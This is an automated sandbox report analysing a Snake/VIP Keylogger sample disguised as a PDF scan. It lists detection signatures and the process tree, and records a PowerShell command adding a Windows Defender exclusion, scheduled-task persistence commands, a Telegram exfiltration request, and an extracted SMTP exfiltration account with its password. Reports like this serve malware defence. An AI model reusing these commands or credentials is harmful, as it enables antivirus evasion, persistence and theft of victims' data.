Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Overview

General Information

Sample name:Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Analysis ID:1541879
MD5:d8daeb11e006370f3b454df74c382ced
SHA1:3351af8f5627d4df174d4c659391a40d9563ca37
SHA256:7b57e6494bb05f09e8a09a69b3c9f28239fe18cb469d223826c95bee2d650197
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)
    • powershell.exe (PID: 3528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1280 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • QeSBxb.exe (PID: 6708 cmdline: C:\Users\user\AppData\Roaming\QeSBxb.exe MD5: D8DAEB11E006370F3B454DF74C382CED)
    • schtasks.exe (PID: 636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • QeSBxb.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\QeSBxb.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 22 entries
            SourceRuleDescriptionAuthorStrings
            8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3b5e4:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x3ac87:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x3aee4:$a4: \Orbitum\User Data\Default\Login Data
            • 0x3b8c3:$a5: \Kometa\User Data\Default\Login Data
            9.2.QeSBxb.exe.4828a58.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.QeSBxb.exe.4828a58.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                9.2.QeSBxb.exe.4828a58.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  9.2.QeSBxb.exe.4828a58.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2bb4f:$a1: get_encryptedPassword
                  • 0x2be6c:$a2: get_encryptedUsername
                  • 0x2b95f:$a3: get_timePasswordChanged
                  • 0x2ba68:$a4: get_passwordField
                  • 0x2bb65:$a5: set_encryptedPassword
                  • 0x2d1f1:$a7: get_logins
                  • 0x2d154:$a10: KeyLoggerEventArgs
                  • 0x2cdb9:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 45 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", ProcessId: 3528, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", ProcessId: 3528, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\QeSBxb.exe, ParentImage: C:\Users\user\AppData\Roaming\QeSBxb.exe, ParentProcessId: 6708, ParentProcessName: QeSBxb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", ProcessId: 636, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", ProcessId: 5056, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", ProcessId: 3528, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", ProcessId: 5056, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T09:17:13.705596+020028033053Unknown Traffic192.168.2.849713188.114.97.3443TCP
                  2024-10-25T09:17:16.658848+020028033053Unknown Traffic192.168.2.849720188.114.97.3443TCP
                  2024-10-25T09:17:17.016512+020028033053Unknown Traffic192.168.2.849721188.114.97.3443TCP
                  2024-10-25T09:17:20.832277+020028033053Unknown Traffic192.168.2.849728188.114.97.3443TCP
                  2024-10-25T09:17:24.208224+020028033053Unknown Traffic192.168.2.849736188.114.97.3443TCP
                  2024-10-25T09:17:24.257516+020028033053Unknown Traffic192.168.2.849738188.114.97.3443TCP
                  2024-10-25T09:17:27.564925+020028033053Unknown Traffic192.168.2.849749188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T09:17:11.331466+020028032742Potentially Bad Traffic192.168.2.849710132.226.247.7380TCP
                  2024-10-25T09:17:13.033043+020028032742Potentially Bad Traffic192.168.2.849710132.226.247.7380TCP
                  2024-10-25T09:17:14.642211+020028032742Potentially Bad Traffic192.168.2.849716132.226.247.7380TCP
                  2024-10-25T09:17:14.829730+020028032742Potentially Bad Traffic192.168.2.849714132.226.247.7380TCP
                  2024-10-25T09:17:16.032825+020028032742Potentially Bad Traffic192.168.2.849714132.226.247.7380TCP
                  2024-10-25T09:17:16.298451+020028032742Potentially Bad Traffic192.168.2.849719132.226.247.7380TCP
                  2024-10-25T09:17:17.579669+020028032742Potentially Bad Traffic192.168.2.849722132.226.247.7380TCP
                  2024-10-25T09:17:17.990967+020028032742Potentially Bad Traffic192.168.2.849723132.226.247.7380TCP
                  2024-10-25T09:17:19.611042+020028032742Potentially Bad Traffic192.168.2.849727132.226.247.7380TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
                  Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeReversingLabs: Detection: 26%
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeReversingLabs: Detection: 26%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeJoe Sandbox ML: detected
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49718 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 091AA812h1_2_091AA050
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 0152F45Dh8_2_0152F2C0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 0152F45Dh8_2_0152F52F
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 0152F45Dh8_2_0152F4AC
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 0152FC19h8_2_0152F961
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C631E8h8_2_05C62DC0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C631E8h8_2_05C62DD0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6DC51h8_2_05C6D9A8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6D7F9h8_2_05C6D550
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C62C21h8_2_05C62970
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C631E8h8_2_05C63116
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6D3A1h8_2_05C6D0F8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6CF49h8_2_05C6CCA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05C60040
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6FAB9h8_2_05C6F810
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6F661h8_2_05C6F3B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6F209h8_2_05C6EF60
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6EDB1h8_2_05C6EB08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C60D0Dh8_2_05C60B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C61697h8_2_05C60B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6E959h8_2_05C6E6B0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6E501h8_2_05C6E258
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 4x nop then jmp 05C6E0A9h8_2_05C6DE00
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 0147F45Dh13_2_0147F2C0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 0147F45Dh13_2_0147F4AC
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 0147FC19h13_2_0147F960
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D31E0h13_2_069D2DC8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D0D0Dh13_2_069D0B30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D1697h13_2_069D0B30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D2C19h13_2_069D2968
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DE959h13_2_069DE6B0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DE0A9h13_2_069DDE00
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DF209h13_2_069DEF60
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DCF49h13_2_069DCCA0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D31E0h13_2_069D2DC3
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DD7F9h13_2_069DD550
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DE501h13_2_069DE258
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DF661h13_2_069DF3B8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DEDB1h13_2_069DEB08
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DD3A1h13_2_069DD0F8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DFAB9h13_2_069DF810
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_069D0040
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069DDC51h13_2_069DD9A8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 4x nop then jmp 069D31E0h13_2_069D310E

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49723 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
